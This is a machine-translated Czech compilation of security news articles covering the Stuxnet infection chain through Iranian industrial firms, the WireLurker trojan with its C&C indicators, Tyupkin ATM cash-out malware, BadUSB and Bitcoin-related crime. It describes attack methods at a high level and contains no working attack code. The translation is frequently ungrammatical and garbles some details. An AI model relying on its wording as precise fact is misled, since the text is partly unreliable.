Když jsme poprvé viděli název počítače, byli jsme velmi překvapilo. Název by mohl znamenat, že počáteční infekce postihlo některé serveru pojmenovaná po naší anti-malware řešení instalované na to. Nicméně, jméno lokální domény, ISIE, nám poskytl s trochou informací, které by mohly pomoci k určení organizace skutečné jméno.
Za předpokladu, že oběť byla umístěna v Íránu, jsme se domníval, že by to mohlo být v íránské společnosti průmyslových inženýrů (ISIE) nebo organizace přidružená s tím, íránské Institutu průmyslového inženýrství ( IIIE ). Ale mohlo to být nějaký jiný ISIE se nachází v nějakém jiném, než Írán místě? Vzhledem k tomu, že náš anti-malware řešení bylo použito v infikovaném počítači, jsme zvažovali možnost, že ISIE mohl být i ruská společnost.
Trvalo nám dlouho, než zjistit, co organizace to opravdu bylo, ale nakonec se nám podařilo identifikovat s vysokou mírou jistoty.
Nazývá se Foolad Technic Engineering Co ( FIECO ). Je to íránská společnost se sídlem v Isfahánu. Společnost vytváří automatizované systémy pro íránské průmyslových objektů (většinou ty, které vyrábí ocel a energie), a má více než 300 zaměstnanců.
Screenshot z webových stránek společnosti
Screenshot z webových stránek společnosti
Společnost se přímo podílí na průmyslových řídicích systémů.
- Provádění lavice měřítku a pilotních projektů, jako jsou údaje o komunikaci mezi PLC existující v rostlině a vzdáleného místa přes internet, vymezením domovskou stránku na (sdělení Processor) CP kartu připojenou k S7 CPU. - Implementace různé síťové struktury, jako interface, Profibus DP, Ethernet, MPI, Profibus PA v elektronických a lehkých komunikačních kanálů. Je zřejmé, že společnost má k dispozici údaje, výkresy a plány pro mnoho íránských největších průmyslových podniků na své síti. Je třeba mít na paměti, že kromě ovlivňujících motorů, Stuxnet součástí funkčnost špionáže a shromažďují informace o STEP, které najdete v infikovaných systémech 7 projektů.
V roce 2010, to samé organizace byla napadena znovu - tentokrát s použitím třetí verze Stuxnet, vytvořený 14. dubna 2010. Dne 26. dubna ve stejném počítači, jako v roce 2009 - "KASPERSKY.ISIE" - byl znovu napaden.
great_stuxnet_06
Tento vytrvalost ze strany tvůrců Stuxnet může znamenat, že se považují Foolad Technic ENGINEERING CO . nejen jako jeden z nejkratších cest k cíli závěrečné červa, ale jako mimořádně zajímavý objekt pro sběr dat o íránské odvětví.
"Doména B"
Ještě jedna organizace byla napadena vícekrát - jednou v roce 2009 a dvakrát v roce 2010. V podstatě, každý ze tří variant Stuxnet byl použit k infekci tohoto cíle. V tomto případě, že útočníci byli ještě přetrvávající než v případě Foolad technické Engineering Co.
Je třeba poznamenat, že právě tato oběť, že pacient byl nulový v roce 2010 globální epidemii . Infekce této organizace v průběhu druhého útoku (březen 2010) vedl k co nejširší distribuci Stuxnet - první v Íránu, a pak po celém světě. Kupodivu, když se tentýž organizace napaden v červnu 2009 av květnu 2010 červ stěží šíří vůbec. Sdílíme své myšlenky o důvodech, které níže.
Vezměte nejrozšířenější variantu - Stuxnet 2010 (aka Stuxnet.b). To byl sestaven na 1. března 2010. První infekce se konal o tři týdny později - 23. března.
great_stuxnet_07
Kromě názvu počítače a název domény, Stuxnet zaznamenala řadu IP zařízení. Skutečnost, že adresa změnila 29. března, m ay naznačují, i když nepřímo, že se jednalo o přenosný počítač, který připojen k lokální síti společnosti jednou za čas.
Ale to, co společnost je to? Doménové jméno - "behpajooh" - nám okamžitě dává odpověď: Behpajooh Co. elektro & Comp. Engineering .
Stejně jako Foolad Technic, se tato společnost se sídlem v Isfahánu, a to také vyvíjí systémů průmyslové automatizace. Je jasné, že se také zabývá SCADA / odborníky zde PLC.
Screenshot z webových stránek společnosti
Screenshot z webových stránek společnosti
Při shromažďování informací o Behpajooh Co jsme objevili ještě jednu zvláštní věc - z roku 2006 článek publikovaný v Dubaj (Spojené arabské emiráty), noviny s názvem Khaleej Times.
great_stuxnet_09
V souladu s článkem, firma Dubaj byl obviněn z pašování bombové komponentů do Íránu. Íránský Příjemce zásilky byl také jmenován - to bylo jisté "Bejpajooh Inc" z Isfahánu.
great_stuxnet_10
Tak proč Stuxnet šíří nejaktivněji v důsledku Behpajooh infekce 03. 2010? Jsme přesvědčeni, že odpověď leží ve druhé organizace v řetězci infekcí, která začala od Behpajooh.
great_stuxnet_11
Jak obrázku výše ukazuje, dne 24.dubna 2010 Stuxnet rozšířil z firemní sítě Behpajooh do jiné sítě, která měla název domény MSCCO. Pátrání po všech možných variant nás vedly k závěru, že s největší pravděpodobností je oběť Mobarakeh Steel Company (MSC), íránský největší výrobce oceli a jeden z největších průmyslových komplexů působících v Íránu, který se nachází nedaleko od Isfahánu, kde Dvě oběti výše uvedené - Behpajooh a Foolad Technic - jsou založeny.
Stuxnet infikování průmyslový komplex, který je zjevně spojený s desítkami dalších podniků v Íránu a používá obrovské množství počítačů ve svých výrobních zařízení, způsobil řetězovou reakci, což má za následek červa šíří tisíce systémů dva nebo tři měsíce. Například analýza protokolů vyplývá, že do července 2010 se toto odvětví infekce dosáhl počítačů v ruských a běloruských firem.
"Doména С"
7. července 2009 Stuxnet 2009 zasáhnout ještě další cíl. S tím, že byl navržen tak, aby začít cestu k jeho konečnému zamýšlené poslání. Oběť Počítač byl pojmenován "applserver" (aplikační server?), Který se nachází v doméně Neda.
great_stuxnet_12
V tomto případě to bylo docela snadné identifikovat organizace obětí. Nade vší pochybnost, to bylo Neda Industrial Group , organizace, která byla uvedena na seznamu sankcí Ministerstvem spravedlnosti USA, a obviněn z nelegálního vývozu zakázaných osob do Íránu, s možnými vojenskými aplikacemi. Kompletní dokumentace této společnosti je k dispozici na íránsko Watch webu .
great_stuxnet_13
Při sledování řetěz šíření Stuxnet, jeden z oborových organizací skupiny vyvolává zvláštní zájem: "Údajně ovládající osobou Nedaye Micron Electronic Company v Teheránu, Írán a Neda zámoří Electronics LLC v Dubaji, Spojené arabské emiráty, poskytuje služby v oblasti průmyslové automatizace pro elektrárny , cement průmyslu a ropy, zemního plynu a petrochemickém odvětví, založená v polovině roku 1980 pod názvem NEDA Computer Products Incorporated jako plně soukromé akciové společnosti " .
Neda byl napaden pouze jednou, v červenci 2009, a Stuxnet nikdy neopustil této organizaci, podle infekce protokolů které máme k dispozici. Nicméně, opustit organizaci, může nebyly jeho cílem je v tomto případě. Jak bylo uvedeno výše, schopnost krást informace o STEP 7 projektů z infikovaných systémů byl předmětem zvláštního zájmu tvůrců Stuxnet.
"Doména D"
Čtvrtá oběť v roce 2009 byl infikován 7. července, ve stejný den, kdy byla Neda ohrožení. Zajímavé je, že infekce začala se serverem, pokud budeme soudit podle názvu počítače - SRV1 v doméně CGJ, stejně jako to udělal v případě Neda.
great_stuxnet_14
Takže, co je CGJ? Strávili jsme nějaký čas česání pomocí vyhledávačů a sociálních sítí, a my jsme přesvědčeni, že je prakticky Control-Gostar Jahedové Company , další Íránská společnost působící v oblasti průmyslové automatizace.
great_stuxnet_15
Control Gostar Jahedové (CGJ) (Private Joint Stock, od 1383), byla založena s cílem lokalizace průmyslových technologií automatizace a využití technické know-how a provedení výkon 30 na plný úvazek zaměstnance v kanceláři v Teheránu a více než 50 workshop personál, dosáhl vysokou kapacitu v poskytování vývojových a technických služeb. Zaměstnavatelé Hlavním cílem v průběhu let bylo na tyto oblasti: - Design, zadávání veřejných zakázek, stavebnictví, programování a uvedení řídicích systémů (DCS, PLC, ESD, F & G) - Design, výroba a instalace nízkého napětí pevné a posuvné panely (využívající produkty kubických Dánsko) - upgradu hardwaru, softwaru a optimalizaci průmyslových automatizačních systémů - poradenské služby a základní a podrobný návrh elektrických a přístrojových systémů - Montáž elektrických a řídící systémy Na rozdíl od Neda Group, Control-Gostar Jahedové společnost není na seznamu sankcí. To byl pravděpodobně vybrán jako cíl, protože jeho působivé vazby spolupráci s největší íránské podniků v produkce ropy, hutnictví a energetiky zásoby.
Tato organizace byla napadena jen jednou v roce 2009, že infekce nezanechal podnikové sítě u cíle a tvoří nejmenší část všech známých Stuxnet šíření linek.
"Doména E"
Pátý a poslední "Pacient Nula" oběť stojí, když soudil podle počtu původně infikovaných systémů. Na rozdíl od všech výše uvedených případech, útok v tomto případě začal ze tří počítačů najednou, v jednom dni (11.5.2010), ale v různých časech.
Informace ze tří různých souborů Stuxnet
Informace ze tří různých souborů Stuxnet
KALASERVER, ANTIVIRUSPC, NAMADSERVER: soudě podle jména, byly alespoň dva servery zapojené v tomto případě.
Takový model infekce nás nutí prakticky jisti, že e-mail nebyl použit jako primární infekce vektoru . Šance jsou velmi malé, že infekce začala od uživatele, obdržíte e-mail, který obsahuje přílohu s zneužít.
Takže to, co je Kala? K dispozici jsou dva nejvíce pravděpodobný odpovědi na to, a my nevíme, která je ta správná. Oba jsou o společnostech zasažených sankce a přímo související s íránským jaderným programem.
No, jednou z možností by mohlo být Kala Naft . Dokumentace pro tuto společnost je k dispozici na Írán Watch webu .
Nicméně, Kala Electric (aka Kalaye Electric Co .), vypadá jako nejpravděpodobnější oběti. To je ve skutečnosti ideální cíl pro útok, vzhledem k hlavní cíl Stuxnet (který je k tomu, aby obohacování uranu odstředivky nefunkčních), dostupné informace o íránském jaderném programu, a logika šíření červa.
Ze všech ostatních společností, Kala Electric je jmenován jako hlavní výrobce íránských centrifug na obohacování uranu, IR-1.
Společnost nemá internetové stránky, ale existuje celá řada k dispozici informace o své činnosti informace: to je jeden z klíčových staveb v rámci celé íránského jaderného programu.
great_stuxnet_17
Také docela Podrobnější informace jsou k dispozici na ISIS ( Institutu pro vědu a mezinárodní bezpečnost ) místo u www.isisnucleariran.org .
Na íránské revidovaném prohlášení o tomto webu základě původně Kalaye Electric byla soukromá společnost, která koupila organizace pro atomovou energii Íránu (AEOI). Název "Kalaye Electric" znamená "elektrické zboží," což znamená, že Írán ponechala původní název pomoci zakrýt skutečný účel zařízení. Írán prohlásil, že Kalaye Electric se stal primární IR-1 Vývoj a testování centrifuga místo poté, co taková práce byla přesunuta v roce 1995 jaderný výzkum v Teheránu Center. MAAE oznámila, že v letech 1997 a 2002, Írán sestaven a testován IR-1 odstředivek na Kalaye Vzhledem k tomu, pohybující se mnoho odstředivka výzkumné a vývojové činnosti Pilot paliva závodem na obohacování uranu (jaderného komplexu PFEP) v Natanzu, Kalaye Electric zůstává důležitým místem odstředivka na výzkum a vývoj. Satelitní snímky Kala elektrických provozních zařízení jsou rovněž k dispozici; ty jsou považovány za místo, kde se vyvinul a otestoval centrifugy.
Tak se zdá, docela rozumné, že tato organizace všech ostatních byl vybrán jako první článek v řetězci infekce má zajistit šnek, aby se jeho konečnému cíli. Ve skutečnosti je s podivem, že tato organizace není mezi cíli útoků 2009.
Shrnutí
Stuxnet zůstává jedním z nejzajímavějších kousků malwaru, kdy byla vytvořena. V digitálním světě, dalo by se říci, že je cyber ekvivalent atomové útoky na Nagasaki a Hirošimu od roku 1945.
Pro Stuxnet být efektivní a proniknout do přísně střeženého zařízení, kde Írán se rozvíjí svůj jaderný program, útočníci měli těžké dilema řešit: jak propašovat škodlivý kód na místo bez přímého připojení k internetu? Zaměření některých "prestižních" společností bylo řešení, a to byl pravděpodobně úspěšná.
great_stuxnet_19
Bohužel, vzhledem k určité chyby nebo konstrukční nedostatky, Stuxnet začala infikovat další organizace a šíří přes internet. Útočníci ztratil kontrolu nad červa, který napadl stovky tisíc počítačů kromě svých stanovených cílů.
Samozřejmě, že je jedním z největších zbývajících otázek - Byli tam nějaký jiný malware, jako Stuxnet, nebo je to jedno-of-a-druhu experiment? Budoucnost říct s jistotou.
iOS Trojan WireLurker: statistiky a nové informace
11.11.2014 Viry V poslední době se objevily zprávy o zajímavém útoku, při kterém útočníci infikují iPhone a Mac OSX s poněkud zvláštním malware daboval WireLurker. Můžete si najít důkladnou papír z Palo Alto zde . Za prvé, je důležité si uvědomit, že všichni uživatelé Kaspersky Lab jsou chráněny proti této hrozbě. Tyto škodlivé soubory používané WireLurker jsou označeny našich výrobků s následujícími názvy detekce:
Mac OS X: Trojan-Downloader.OSX.WireLurker.a Trojan-Downloader.OSX.WireLurker.b Trojan.OSX.WireLurker.a Apple iOS: Trojan-Spy.IphoneOS.WireLurker.a Trojan-Spy.IphoneOS.WireLurker.b Windows: Trojan.Win32.Wirelurker.a Naše senzory pozorovány připojení ke škodlivému serveru C & C se sídlem v Hong Kongu v červenci 2014. To pokračovalo v průběhu následujících měsíců, i když objem zůstává nízký.
Zajímavé je, že diskuse o různých on-line fóra o tomto tématu se objevily na počátku tohoto roku, a to zejména v čínštině a korejštině, ale také na některých anglických zdrojů:
Screen Shot 2014-11-06 v 5.38.17 PM
14. července někdo jménem SirBlanton stěžoval na čínské mluvení BBS:
Screen Shot 2014-11-06 v 5.40.05 PM
Překlad:
maiyadi_inf
Diskuse Výše stalo "bbs.maiyadi.com", což je zajímavé, protože jiný subdoména na "maiyadi.com" je používán malware jako C a C (viz níže).
Dokonce dříve, 29. května diskuze v Koreji uvedených abnormální chování Mac OS X infikované touto hrozbou:
Screen Shot 2014-11-06 v 5.42.21 PM
Zajímavé je, že Mac OS X a Apple iOS nejsou jediné platformy, jehož prostřednictvím byly vypěstované tyto útoky. Včera náš přítel Jaime Blasco z Alienvault objevil nebezpečný nástroj, Win32, který zřejmě souvisí.
Modul WireLurker Windows
Název souboru: 万能 视频 播放 器 2.21.exe md5: fb4756b924c5943cdb73f5aec0cb7b14
1
Win32 WireLurker modul
Soubor se zdá být sestavena v března 2014 za předpokladu, že časové razítko se nemění:
2
Full metadata soubor:
Machine Type : Intel 386 or later, and compatibles Time Stamp : 2014:03:13 03:56:21-04:00 PE Type : PE32 Linker Version : 10.0 Code Size : 721920 Initialized Data Size : 1364480 Uninitialized Data Size : 0 Entry Point : 0xafb86 OS Version : 5.1 Image Version : 0.0 Subsystem Version : 5.1 Subsystem : Windows GUI File Version Number : 1.0.0.1 Product Version Number : 1.0.0.1 File Flags Mask : 0x003f File Flags : (none) File OS : Windows NT 32-bit Object File Type : Executable application File Subtype : 0 Language Code : Chinese (Simplified) Character Set : Unicode File Description : 绿色IPA安装器 File Version : 1.0.0.1 Internal Name : 绿色IPA安装器.exe Original Filename : 绿色IPA安装器.exe Product Name : 绿色IPA安装器 Product Version : 1.0.0.1 Interní název souboru je " 绿色IPA安装器 ", který v překladu do angličtiny, znamená Green NPP instalátor . To má být aplikace instalovat IPA soubory na zařízeních se systémem iOS.
Zajímavé je, že obsahuje debug cesta, která odhaluje informace o sestavení:
E: \ lifei \ libimobiledevice-win32-master_last \ Release \ appinstaller.pdb Aplikace obsahuje dva IPA (Apple aplikace archivy) uvnitř, jeden s názvem "AVPlayer" a jeden s názvem "Aplikace". AVPlayer.app se zdá být legimitated iOS aplikace, který je používán útočníky jako návnadu.
(Ikona) obraz aplikace lze vidět níže:
4
Zobrazí se okno "důvěryhodně" aplikace byly autorem populární vývojář jít za rukojeť "teiron@25pp.com".
234
Druhý IPA je mnohem zajímavější. 001Zdá se, že byly vytvořeny března 2014. "Aplikace" komunikuje s dobře známé "comeinbaby com [.]": 002sfbase.dylib část komunikuje s jiným C & C: 003Abych to shrnul, je popsáno aplikace Win32 zde umožňuje instalaci zmíněného iOS nákladu na iPhone oběti. Tvůrce pravděpodobně vyvinul to jen proto, aby se ujistil, uživatelé Windows mohou také nakazit na svých zařízeních se systémem iOS.
KSN detekce Kaspersky Security Network (KSN) je komplexní distribuované infrastruktury věnuje zpracování kybernetické související datové toky milionů dobrovolných účastníků po celém světě. Poskytuje bezpečnostní inteligenci Kaspersky Lab pro každého partnera nebo zákazníka, který je připojen k Internetu, což zajišťuje nejrychlejší reakční doba, nejnižší míry falešné pozitivity a udržení nejvyšší stupeň ochrany. Podrobný popis KSN lze nalézt zde . Níže Následující graf ukazuje detekcí WireLurker na OSX:6
Více než 60% zjištěných přicházejí z Číny, které lze očekávat.
Závěry Tento incident je dalším připomenutím, proč používání pirátského softwaru je stále nebezpečné, bez ohledu na to, kterou platformu používáte. Stahování aplikací z neoficiálních zdrojů, jako jsou alternativní tržiště, webové stránky pro sdílení souborů nebo torrentů a jiných sítí P2P sdílení souborů, zvyšuje riziko malware infekce. V systému Mac OS X například, to je jeden z hlavních infekčních vektorů.
Potřeba ochrany proti malwaru na Mac OS X zařízení nelze přeceňovat. Není to jen to, že váš Mac OS X Stroj může nakazit, ale WireLurker nám ukázal, jak se infekce může pohybovat z vašeho počítače Mac na váš iPhone. Dobrou zprávou je: existuje spousta možností, aby si vybral z venku, včetně naší vlastní aplikace Kaspersky Internet Security pro Mac .
Jako první linii obrany, by se uživatelé systému Mac OS X zkontrolujte svůj Ochrana osobních údajů nastavení, ujistěte se, že konfigurace svého systému je optimální. Doporučujeme nastavení Gatekeeper, takže pouze aplikace stažené z Mac App Store a určená vývojářům mohou být instalovány. Více informací o Gatekeeper naleznete zde .
Ujistěte se, že se také podívat na vlastní návod pro Mac zabezpečení: 10 jednoduchých tipů pro zvýšení zabezpečení vašeho počítače Mac
To by také mělo být budíčkem pro uživatele Apple a tak si myslí, že o bezpečnost. Stejně jako Mac OS X malware rychle se vyvinul z bytí jen mýtus se stává smutnou realitou, jsme svědky iOS terčem stále častěji v poslední době - se nikdo prozatím schopny zajistit ochranu pro tuto platformu. Anti-malware prodejci stále nesmí vyvíjet ochranu pro uživatele iPhone.
Ve světle nedávných událostí, bude tato změna strategie v budoucnosti?
Indikátory kompromisu:
C & Cs: [.] app.maiyadi com [.] com comeinbaby 61.147.80.73 124.248.245.78
Infikované bankomaty rozdávat miliony dolarů bez kreditní karty 8.10.2014 Viry Kaspersky Lab provádí forenzní vyšetřování cybercriminal útoků na několik bankomatů po celém světě. V průběhu tohoto šetření, výzkumníci objevili malware Tyupkin slouží k infikovat bankomatů a umožňují útočníkům odebrat peníze prostřednictvím přímé manipulace, krást miliony dolarů. metodiky útok Zločinci pracovat ve dvou fázích. Za prvé, získat fyzický přístup k bankomatu a vložte bootovací CD pro instalaci Tyupkin malware. Poté, co se restartovat systém, infikovaných ATM je nyní pod jejich kontrolou a malware běží v nekonečné smyčce čeká na povel. Chcete-li podvod těžší rozpoznat, Tyupkin malware přijímá pouze příkazy v určitých časech v neděli a pondělí večer. Během těchto hodin, útočníci jsou schopni ukrást peníze z infikovaného počítače. Videozáznam získané z bezpečnostních kamer z infikovaných bankomatů ukázal metodiku používanou pro přístup k hotovosti z automatů. Unikátní číslice kombinace založené na náhodných čísel je nově vytvořené pro každou relaci. Tím je zajištěno, že žádná osoba mimo gang se mohlo těžit z podvodu. Pak operátor škodlivého obdrží pokyny po telefonu od jiného člena gangu, který zná algoritmus a je schopen generovat klíč relace založené na uvedeném telefonním čísle. Tím je zajištěno, že muly vybírá hotovost nesnažte se jít sám. Když je klíč zadán správně, ATM zobrazí podrobnosti o tom, kolik peněz je k dispozici v každém hotovosti kazety a vyzval provozovatele, aby si vybrat, který kazetu vyloupit. Bankomat pak dávkuje 40 bankovky v době od zvoleného zásobníku.
Tyupkin malware
Na žádost finanční instituce, společnosti Kaspersky Lab Global Research a Analysis Team provedla forenzní vyšetřování této Cyber-kriminální útok. Malware identifikován a pojmenován společností Kaspersky Lab jako Backdoor.MSIL.Tyupkin, dosud byl zjištěn na bankomatech v Latinské Americe, Evropě a Asii. "Za posledních několik let jsme zaznamenali velký vzestup útoků ATM skimming pomocí zařízení a škodlivý software. Nyní jsme svědky přirozený vývoj této hrozby se počítačoví zločinci pohybující se řetěz a zaměření finanční instituce přímo. Toto je děláno tím, že nakazí bankomatů sami, nebo zahájení přímých útoků APT stylu vůči bankám. Tyupkin malware je příklad z útočníků, kteří využívají nedostatků v infrastruktuře ATM, "řekl Vicente Diaz, hlavní bezpečnostní výzkumník ve společnosti Kaspersky Lab. "Důrazně doporučujeme, aby banky zkontrolovat fyzickou bezpečnost svých bankomatů a síťové infrastruktury a zvážit investice do zabezpečení kvality řešení," dodal. "pachatelé jsou neustále identifikovat nové způsoby, jak rozvíjet své metody k páchání trestné činnosti, a to je důležité, že budeme držet vymáhání práva v našich zemích angažováni a informováni o současných trendech a metodách, "řekl Sanjay Virmani, ředitel Centra kriminality INTERPOL Digital. Kaspersky Lab doporučuje následující bankám, aby se zmírnilo riziko:
Zkontrolujte fyzické bezpečnosti všech bankomatů a zvážit investice do bezpečnostních řešení kvality. Vyměňte všechny zámky a hlavní klíče na horní kapotu bankomatů a příkop výchozí poskytované výrobcem. Nainstalujte alarm a ujistěte se, že je v dobrém stavu. Fotoaparát Cyber-zločinci stojí za Tyupkin pouze infikovaných bankomatů, které bylo nainstalováno žádné bezpečnostní alarm. Změňte výchozí heslo systému BIOS. Ujistěte se, že stroje mají up-to-data antivirovou ochranu.
Obrana před novým virem prakticky neexistuje
4.10.2014 Viry Bezpečnostní experti společnosti SR Labs Karsten Nohl a Jacob Nell letos v srpnu odhalili bezpečnostní riziko týkající se USB rozhraní. Tento týden o chybě byly prozrazeny všechny detaily, které mohou kybernetickým zločincům posloužit k napadení cizích počítačů. Útok prostřednictvím této trhliny nemají uživatelé navíc šanci zpozorovat. Útok prostřednictvím této zranitelnosti rozhraní USB nemají uživatelé šanci zpozorovat. Už srpnové odhalení zranitelnosti udělalo bezpečnostním expertům vrásky na čele. Až doposud si totiž s většinou hrozeb týkajících se rozhraní USB dokázaly antivirové programy poradit, to ale u novinky neplatí.
Výzkumníci Adam Caudill a Brandon Wilson, kteří se hrozbou také zabývali, však na bezpečnostní konferenci Derbycon 4,0 v americkém Louisvillu tento týden odhalili všechny podrobnosti. Tím zároveň dali případným útočníkům silnou zbraň do ruky, upozornil server Security Week.
Bezpečnostní expert Karsten Nohl Bezpečnostní expert Karsten Nohl pomohl zranitelnost rozhraní USB odhalit.
„Naše víra nám jasně říká, že všechny naše znalosti by měly být veřejné,“ uvedl Caudill na dotaz, proč podrobnosti k chybě vyzradili.
Nohlovi a Nellovi se podařilo vytvořit už v první polovině letošního roku nezvaného návštěvníka, který prakticky nemůže být odhalen. Útok nového viru nazývaného BadUSB je směřován přímo na USB řadič, jenž je umístěn přímo na základní desce a stará se o komunikaci mezi USB zařízením a samotným počítačem.
Standard USB se stal tak běžný, že jsme se jen zřídka starali o bezpečnostní dopady. Bezpečnostní expert Karsten Nohl Škodlivý kód je schopen využít toho, že většina těchto čipů nedisponuje žádným zabezpečením. Jednoduše se tedy před bezpečnostními aplikacemi tváří, že se jedná o ovládací software USB řadiče, nikoliv o zákeřný virus. Současné antiviry i firewally jsou proto na něj krátké, uvedl server Security Affairs.
„Standard USB se stal tak běžný, že jsme se jen zřídka starali o bezpečnostní dopady. Většina z nás považovala USB disky po antivirové kontrole za naprosto bezpečné. Až do teď… Libovolnou flešku je možné přeprogramovat tak, aby útočník získal zcela kontrolu nad systémem,“ podotkl již dříve Nohl.
Bezpečnostní experti navíc poukázali na to, že jejich hrozba se dokáže automaticky replikovat a přenášet z jednoho zařízení na druhé. Snadno se tak mohou nakazit všechna USB zařízení, která mají paměť a která se připojí k PC.
Záplaty jen pro novější počítače Jen zlomek výrobců základních desek od srpna na hrozbu zareagoval a vydal aktualizace ovládacího softwaru (tzv. firmwaru), které eliminují možnost průniku do cizího systému prostřednictvím USB. Záplaty jsou k dispozici navíc jen pro cca dva roky staré stroje. Zbylí uživatelé jsou tak nyní vydáni kybernetickým útočníkům napospas.
Uživatelé by tak měli z preventivních důvodů zkontrolovat dostupné aktualizace pro základní desky svých počítačů a notebooků. V případě, že bude k dispozici update rozhraní USB, neměli by s instalací v žádném případě otálet.
Bezpečností experti se totiž shodují, že když jsou nyní všechny podrobnosti o hrozbě k dispozici, počítačoví piráti se na trhlinu s největší pravděpodobností zaměří.
CSAM: The Power of VirusTotal zapnout neškodné Binaries škodlivý 4.10.2014 Viry Všichni víme, že anti počítačový virus, nutné zlo základní počítačové bezpečnosti, není cizí falešných poplachů. Takže žádné velké překvapení, když zde John píše, že se dostal do takový falešný poplach během reakce na incidenty:
Byl jsem skenování forenzní Drive Image s ClamAV a zaznamenal pozitivní zásah na souboru.
Skvělé. ClamAV, zdarma anti-virus produkt. Samozřejmě, že tomu nevěřím. Takže John udělal to, co většina z užívání by to udělal, a předložila podezřelého binární VirusTotal:
VirusTotal ukázal 14 z 50 výrobků jiných AV prodejců z nich ji považovalo malware stejně.
Ouch! 14 z 50? Mnoho skutečné vzorky malware jsem odeslal dostat nižší cenu a pak to. Ukázalo se, že binární otázky byl software pro správu desktopů, "lunchwrapper.exe" a AV nástroje zvedl na to je stažení souboru součásti (slavný "generic downloader" podpisy).
Ale myslíte, že to je špatné? Poslouchejte, co se stalo potom podle Jana:
Děsivé bylo, že poté, co jsem předložil vzorek, další významné AV prodejci rozhodl, že předložený vzorek byl škodlivý a náš koncový software spuštění karantény program po AV Dats byl aktualizován.
Koneckonců, jak můj kolega developer může potvrdit i: Důvod, proč jsme lidem umožní využít našich aplikací je tak, že jsme nemuseli dělat žádné testování sami.
(BTW: VirusTotal / Google dělá skvělou práci, a myslím, že je to dobrá věc, že se distribuce vzorků Problém je v tom, jak AV prodejci tyto informace používat.).
No, to eskalovalo rychle Penny-krást malware multi-miliónové loupeže, rychlý přehled o Bitcoin Bonanza v digitálním věku
26.9.2013 Viry Zajímavý titul cítil jen o právu na zajímavé téma, když jsem poprvé předložena můj výzkum papír o vývoji Bitcoin kyberkriminality letošního ročníku Virus Bulletin konferenci, která se konala v bezesnou Seattlu. Diskutovat o situaci z ekonomického hlediska jsem se zaměřila namalovat obraz odrážející jak současná geopolitická situace v Latinské Americe je region úrodnou půdou pro Bitcoin nadšence, a potažmo i zločinci. Je to určitě není snadné zachytit snímek z jevů, které se mění tak rychle, a předloží ji do skupiny bezpečnostních odborníků, kteří jsou již dobře informováni o toto téma. Nicméně, s pomocí regionálních statistik, nehod časových a analýza nejzajímavějších vzorků malwaru, je zde dostatek informací v této zprávě dát nějaké jasné ukazatele o tom, co se děje s světově nejpopulárnější cryptocurrency minulý rok, a to, co jsme lze očekávat, že v budoucnu, pokud jde o Bitcoin-související s počítačovou kriminalitou.
Zatímco někteří inovátoři byli zapojeni do trhu Bitcoin od počátku (formou těžby nebo prostě účastí na výměnách), ostatní jsou jen uchopit koncept cryptocurrencies a učení o nebezpečích Bitcoin po zlém - ať už je to v forma ransomware požadují rychlou platbu nebo škodlivý důlní kód náročné svých omezených výpočetních zdrojů. Z peněženky krást malware ve velkém měřítku Bitcoin výměnných loupeže, můžeme najít téměř cokoliv ve cryptoworld, a to je jen začátek. V současné době hovoříme o malwaru a počítačové kriminalitě jako dvě strany téže mince (bit), obvykle se odkazovat na organizované posádky zločinců s jasně definovanými rolemi zapojení do nedovolené činnosti s jediným účelem finančního zisku. To dává smysl, pak pozorovat korelaci mezi počtem vzorků malwaru ve volné přírodě cílení Bitcoin uživatelů a ceny měny dochází k výměně na světových trzích.
pontiroli_1
Více uživatelů, více útoků: Kaspersky Lab statistiky ukazují nárůst Bitcoin počítačové kriminalitě
Jak již bylo zmíněno v 2013 v bulletinu zabezpečení společnosti Kaspersky je naše předpovědi pro cybercriminal Bitcoin ekosystém se stal skutečností - a pak některé : "Útoky na Bitcoin bazény, výměny a uživatelů Bitcoin se stane jedním z nejvíce high-profil témata roku útoků na burzách cenných papírů. bude zejména mezi podvodníky, protože jejich poměr nákladů a výnosů je velmi příznivá.
Pokud jde o uživatele Bitcoin, v roce 2014 očekáváme výrazný nárůst počtu útoků na jejich peněženky. Dříve, zločinci infikovaných počítačů obětí a šel na jejich využití pro těžbu. Nicméně, tato metoda je nyní mnohem méně efektivní než dříve, zatímco krádež Bitcoins slibuje zločinci obrovské zisky a kompletní anonymitu. "
Je to dlouhá doba, co jsme se dostali až za týden, aniž by jeden z hlavních Bitcoin burzách dělat hlavní zprávy. Můžeme atribut Úspěch některých útoků na chybné technické implementace Bitcoin peněženky, jiní spoléhali na chytré sociálního inženýrství přístupy, a zbytek může být obviňován na špatných obchodních praktik a prosté nedbalosti o dodržování již osvědčené bezpečnostní normy. Tam jsou jen příliš mnoho případů do seznamu, ale tam je společným jmenovatelem je všechny sjednotit, což je velký soubor zkušeností pro budoucí generace Bitcoin výměnu stavět dělá.
Teprve nedávno jsme viděli, proč země jako Argentina a Brazílie, se staly živnou půdou pro přijetí cryptocurrency ekonomiky, a jak jsme si to uvědomují, a proto mají i zločinci. Díky celé řadě nových podvodů, podvodů a hrozeb, kterým čelí Bitcoin práv, občané si musí být vědomi, že udržet své úspory v bezpečí není snadný úkol v dnešní hyper propojeném světě. Protože nejsou tam žádné hranice pro cryptocurrencies, není tomu tak pro zločince a to buď, a po pohyb peněz znamená, že přistání v Latinské Americe, kde se valná publikum je stále široce vystaveny mnoha útokům vidět v jiných částech světa.
Po Mt. GOX incidentu jsme byli svědky cílené phishingové kampaně, Bitcoin členů komunity načerno, jak soukromých detektivů, lokalizovaných vzorků ransomware, podvody, mobilní horníků, internet věcí, zařízení, které se účastní botnetů, a všeho ostatního, že tento digitální Bitcoin zlatá horečka přivedla na nás.
pontiroli_2
Analýza, malware z mt GOX Leak Archiv
Být vaše vlastní banka je mnohem obtížnější, než se zdá
Alchemy ukázalo možné cryptocurrency nadšence, soustružení energii do hlavního města, sází na úspěch a globální přijetí své oblíbené volby. Při pohledu zvenčí jako koníček pro mágů, Bitcoin je více než měna, je to komunita, která má určité hodnoty zakořeněny, a to revoluci finanční svět, jak v současné době vědět.
Kolektivní ale anonymní, organizovaný ještě decentralizované, to nařídil chaos začíná dávat smysl po všech těch problémech, co s nimiž se potýkají. Utracení nadbytečných výměn, které bývaly k dispozici přináší darwinovské rovnováhu na Bitcoin ekosystému, nutit ty vlevo zavést lepší obchodní praktiky a bezpečnostní opatření.
